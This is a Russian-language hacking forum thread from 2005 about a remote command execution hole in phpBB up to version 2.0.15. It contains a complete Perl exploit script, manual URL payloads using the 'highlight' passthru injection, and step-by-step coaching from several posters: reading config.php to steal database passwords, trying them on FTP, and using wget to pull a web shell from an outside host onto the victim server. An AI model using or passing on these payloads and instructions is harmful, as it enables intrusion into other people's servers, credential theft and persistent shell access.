Форумы Уязвимости форумов phpbb 2.0.15

Discussion in 'Уязвимости CMS/форумов' started by exbbxak, 30 Jun 2005.

  1. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    а как файл взять то там зарегистроваться надо! дай другой линк и что за сплойт?
     
  2. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    этот баг работает =)) зер гуд...

    как я понял, методом тыка, кол-во повторений вызываемой команды равно кол-ву постов на странице =))) так чтоб было удобней выбирайте топик, где только одно сообщение =))
     
  3. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    Блин понатуре выложите сюда, там нада регаться... =))) Пожалуйста!!!
     
  4. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    по многочислеым просьбам трудящихся:

    Code:
    #!/usr/bin/perl
    
    use IO::Socket;
    
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    if (@ARGV < 4)
     {
     print q(############################################################
         phpBB <=2.0.15 remote command execution exploit
            by RusH security team // www.rst.void.ru
    	Littttttttttle modificated by nori!
    		r57 respect!
    ############################################################
     usage:
     
    r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
     params:
      [URL] - server url e.g. www.phpbb.com
      [DIR] - directory where phpBB installed e.g. /phpBB/ or /
      [NUM] - number of existing topic
      [CMD] - command for execute e.g. ls or "ls -la" 
    ############################################################
     );   
     exit;
     }
    
    $serv  = $ARGV[0];
    $dir   = $ARGV[1];
    $topic = $ARGV[2];
    $cmd   = $ARGV[3];
    
    $serv =~ s/(http:\/\/)//eg;
    print "*** CMD: [ $cmd ]\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    
    $cmd=~ s/(.*);$/$1/eg;
    $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    
    $path  = $dir;
    $path .= 'viewtopic.php?t=';
    $path .= $topic;
    $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
    $path .= $cmd;
    $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
    $path .= '&highlight=%27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%27';
    
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
    
    print $socket "GET $path HTTP/1.1\n";
    print $socket "Host: $serv\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    
    $on = 0;
    
    while ($answer = <$socket>)
    {
    if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
    if ($on == 1) { print "  $answer"; }
    if ($answer =~ /^_START_/) { $on = 1; }
    }
    
    print "[-] EXPLOIT FAILED\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    
    ### EOF ###
    
    все спасибо ввиде повышения репутации :D
     
    #24 GreenBear, 1 Jul 2005
    Last edited: 1 Jul 2005
  5. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    это сплойт Раш Тимы на 2.0.10 в переделанном виде ))
    щас попробоую...))
     
  6. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Как им пользоваться?
     
  7. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
     
  8. S1on

    S1on New Member

    Joined:
    1 Jul 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Здарова народ. Я тут новинький :)
    Чёта я куда небюсь этим сплойтом, мне все выдает "Exploit failed" У ковонить он нормально работает?
     
  9. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    да, у меня.
     
  10. WeKSTiK

    WeKSTiK New Member

    Joined:
    15 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    И у меня, всё работает на ура!!!
     
  11. S1on

    S1on New Member

    Joined:
    1 Jul 2005
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    я ввожу "phpbb.pl 192.168.140.14 / 459 "ls -la"
    форум пропачен до 2.0.15 причем криво, с хакера сплоит пробивает но он какой то странный. Это тоже канает (http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).')
    кстати, как спомощью этого /\/\/\ грузануть файл на сервак?
     
    #31 S1on, 2 Jul 2005
    Last edited: 2 Jul 2005
  12. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    у меня тоже это сплойт работал только тогда когда он вышел в свет))) а щас все время файлед...
    >>надо компилировать код пот названием r57phpbb2010.pl ?!
    вы что не понимаете что ПЕРЛ СКРИПТЫ не компилят??
     
  13. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    дык я думаю против такой баги даже самые ленивые админы обновляют форумы.
     
  14. Dragunov

    Dragunov Banned

    Joined:
    3 Jul 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    &cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
    Воспользовался вот этой темой...
    admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php
    Получил данное сообщение.
    Обясните ламеру что делать дальше? Как получить пароли от форума и.т.п.?
     
  15. Dragunov

    Dragunov Banned

    Joined:
    3 Jul 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Пожалуйста помогите)) Введите в курс дела...объясните че за сплойт)) ПОжалуйста!
     
  16. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Dragunov, максимум что ты получишь - пароли от БД. =))

    их получаешь из следующей команды:
    viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_GET_VARS[cmd]).'

    Запустил? Ничего не появилось?:)) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
    <?php
    $dbms = 'mysql';
    $dbhost = 'localhost';
    $dbname = '*********';
    $dbuser = '*******';
    $dbpasswd = '*****';

    $table_prefix = 'phpbb_';

    define('PHPBB_INSTALLED', true);
    ?>

    Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.

    для заливки шелла юзаем команду wget. Синаксис:
    wget http://shell.narod.ru/shell.php
    Пишем это дело в cmd в урле.

    Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
    cmd=ls -la;wget http:// ....
    вот приблизительно так должно получиться)).
    Переходить в др. директории командой cd.

    зы: можно писать несколько команд через точку с запятой.
     
  17. Dragunov

    Dragunov Banned

    Joined:
    3 Jul 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Я грю)) Я конкретный ламер) ЧТо такое шелл?
     
  18. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    нда...
    шелл - оболочка для удалённых команд, грубо говоря..)
    иди на php.spb.ru/remview/
    и качай remview.php . Это и есть шелл.
    его и будешь заливать, только сначала зарегь сайт на народе и туда залей шелл. потом будешь к нему обращаться... С тебя 5 баксов =)).
     
  19. Dragunov

    Dragunov Banned

    Joined:
    3 Jul 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Не качает...пишет архив битый...
     
  20. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128